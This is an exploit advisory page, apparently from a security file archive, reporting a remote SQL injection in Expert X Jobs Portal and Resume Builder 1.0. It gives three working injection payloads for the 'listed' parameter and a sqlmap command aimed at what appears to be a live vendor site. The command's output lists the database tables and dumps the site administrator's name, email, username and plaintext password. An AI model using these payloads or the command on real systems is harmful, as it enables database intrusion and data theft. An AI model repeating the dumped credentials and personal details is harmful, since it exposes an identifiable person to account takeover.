what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Expert X Jobs Portal And Resume Builder 1.0 SQL Injection

Expert X Jobs Portal And Resume Builder 1.0 SQL Injection
Posted Jul 26, 2022
Authored by CraCkEr

Expert X Jobs Portal and Resume Builder version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 376564ceda2e198de8dceb8ed5116a678ef9962cb5cead849c271870ad95168e

Expert X Jobs Portal And Resume Builder 1.0 SQL Injection

Change Mirror Download
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : wvidesk.com │ │ │
│ Vendor : WVIDesk │ │ │
│ Software : Expert X - Jobs Portal and │ │ Expert X can manage jobs, courses, │
│ Resume Builder v. 1.0 │ │ events and scholarships. │
│ Vuln Type: Remote SQL Injection │ │ │
│ Method : GET │ │ │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


GET parameter 'listed' is vulnerable.

---
Parameter: listed (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD

Type: time-based blind
Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)
Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#
---

[+] Starting the Attack

sqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent

[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:03:36] [INFO] fetching current database
[23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers'
current database: 'livexzfv_jobdreamers'


fetching tables for database: 'livexzfv_jobdreamers'

Database: livexzfv_jobdreamers
[56 tables]
+---------------------+
| adminMenu |
| applyajob |
| candidatefeedback |
| candidatelogin |
| candidateview |
| clickcount |
| controlall |
| controlcategory |
| coursecategory |
| courseinstitute |
| coursevisitsite |
| eventcategory |
| eventtype |
| jobagentcountry |
| jobalert |
| jobcategory |
| jobcity |
| jobcompanyinfo |
| jobcontinent |
| jobcountry |
| jobeducationsubject |
| jobindustry |
| jobmessage |
| jobpostingprice |
| jobquestion |
| jobseniority |
| jobuniversity |
| jobusermaster |
| jobusertype |
| jobvisitsite |
| mainmenu |
| postacourse |
| postaevent |
| postajob |
| postascholarship |
| resumeaward |
| resumecarsum |
| resumecertificate |
| resumecomment |
| resumeeducation |
| resumelanguage |
| resumeprofessional |
| resumepublication |
| resumeresearch |
| resumeskill |
| resumesumexp |
| resumetraining |
| resumework |
| scholarshipperiod |
| seeker_profile |
| seekers_admin |
| siteAdmin |
| siteadminuser |
| tbl_countries |
| tblpage |
| userrole |
+---------------------+

fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers'

Database: livexzfv_jobdreamers
Table: siteadminuser
[8 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| aflag | varchar(2) |
| desig | varchar(200) |
| enet | varchar(450) |
| fullname | varchar(450) |
| id | int(10) |
| pw | varchar(25) |
| role | int(10) |
| users | varchar(200) |
+----------+--------------+


fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers'


Database: livexzfv_jobdreamers
Table: siteadminuser
[1 entry]
+-------+------------+--------------------+------------------------+----+------+------+-------+
| aflag | desig | enet | fullname | id | pw | role | users |
+-------+------------+--------------------+------------------------+----+------+------+-------+
| Y | Site Admin | alam5664@gmail.com | Mohammad Alamgir Kabir | 1 | 5664 | 1 | Kabir |
+-------+------------+--------------------+------------------------+----+------+------+-------+


[-] Done
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close